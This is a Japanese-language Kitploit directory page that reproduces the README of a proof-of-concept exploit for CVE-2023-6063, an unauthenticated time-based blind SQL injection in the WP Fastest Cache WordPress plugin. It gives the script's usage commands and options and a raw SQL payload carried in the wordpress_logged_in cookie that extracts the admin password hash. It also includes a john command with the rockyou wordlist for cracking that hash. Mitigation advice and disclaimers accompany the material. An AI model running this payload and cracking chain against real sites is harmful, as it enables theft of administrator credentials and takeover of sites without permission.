Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-6063-PoC — CVE-2023-6063のProof on Concept、WP Fastest Cache ≤1.2.2における時間ベースのブラインドSQLインジェクション脆弱性。 | Kitploit
ツール/GitHubGitHub/incommatose/cve-2023-6063-poc
パスワードクラッキング脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubincommatose/cve-2023-6063-poc

CVE-2023-6063-PoC

CVE-2023-6063のProof on Concept、WP Fastest Cache ≤1.2.2における時間ベースのブラインドSQLインジェクション脆弱性。

リポジトリを見る
21391年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-6063 の PoC: WP Fastest Cache 1.2.2 未認証ブラインドSQLインジェクション

Static Badge Static Badge Static Badge

CVE-2023-6063 の概念実証(PoC)です。WP Fastest Cache ≤1.2.2 における時間ベースのブラインドSQLインジェクションの脆弱性を利用し、wordpress_logged_in クッキーを悪用して wp_users テーブルからハッシュ化されたパスワード (user_pass) とメールアドレス (user_email) を抽出します。

特徴

  • SLEEP() ディレイを用いた時間ベースのデータ抽出(1文字ずつ)
  • カスタムクッキー、対象ユーザー名、ハッシュ検証をサポート。

このスクリプトが抽出するもの:

  • ☑️ WordPress パスワードハッシュ (MD5/PHPass)
  • ☑️ 関連するメールアドレス
  • 柔軟なテストのための CLI 引数 (--just-hash, --just-email, --debug)

使用方法

依存関係をインストールします(まだインストールしていない場合):

root@kitploit:~
pip install -r requirements.txt

基本的な使い方:

root@kitploit:~
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5

全オプション:

root@kitploit:~
  -h, --help            show this help message and exit
  -u URL, --url URL     Full URL to Wordpress for testing CVE-2023-6063
  --username USERNAME   Define a user to extract its hashed pass
  -d DELAY, --delay DELAY
                        Time for wait web response default 5, minimum 2
  -H HASH, --hash HASH  Hash to verify against wp_users table, if the hash contains specials characters, please use single quotes -> '<hash>'
  --domain DOMAIN       Name of the domain for email validation
  -c COOKIE, --cookie COOKIE
                        Specify a cookie name if it's different on your context
  --status-code STATUS_CODE
                        Use a specific positive status code, default 200
  --debug               More verbosity
  --just-hash           Just extract hashed password
  --just-email          Just extract email value for a user

💻 デモ

これは admin ユーザー向けのデモです。

https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890

ハッシュ化されたパスワードが漏洩した場合、パスワードが脆弱であれば、john または hashcat を使用して PHPass アルゴリズムで復号します。

John の例:

root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass

🕵️‍♂️ 技術的詳細

📖 脆弱性の説明

WordPress 用 WP Fastest Cache プラグイン (≤1.2.2) は、wordpress_logged_in クッキーを介した未認証のブラインドSQLインジェクションに対して脆弱です。攻撃者はこの欠陥を悪用し、SQL クエリで時間ベースの遅延 (SLEEP()) を利用して wp_users テーブルから機密データ(パスワードハッシュ、メールアドレスなど)を抽出できます。

root@kitploit:~
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -

🚨 免責事項: この情報は、適切な許可を得た倫理的なセキュリティテストにのみ使用してください。無断での悪用は違法です。

  • CVE ID: CVE-2023-6063
  • 脆弱性スコア: 7.5 (High)
  • 脆弱性タイプ: SQLインジェクション (Blind, Time-Based)
  • 影響を受けるソフトウェア: WP Fastest Cache (WordPress プラグイン) ≤ v1.2.2

🔍 攻撃ベクトル

  • 悪用可能性: リモート (認証不要)
  • 攻撃の複雑さ: 低 (巧妙に細工されたHTTPリクエストで悪用可能)

🔥 影響:

  • 機密性: 高 (管理者資格情報の漏洩)
  • 完全性: なし
  • 可用性: なし

📌 影響を受けるバージョン

  • WP Fastest Cache バージョン ≤1.2.2

🛡️ 緩和策

WP Fastest Cache をバージョン >1.2.2 にアップグレードしてください。

  • WP Fastest Cache v1.2.3 以降にアップグレード。
  • WAF ルールを適用してクッキー内のSQLiペイロードをブロック。
  • 使用しない場合はプラグインを無効にしてください。

📚 参考文献

  • NIST NVD エントリ
  • WordPress プラグインのアドバイザリ
  • CVE 詳細

⚖️ 法的注意事項

  • このスクリプトは教育目的です。テスト前には必ず明示的な許可を得てください。
ツールをダウンロード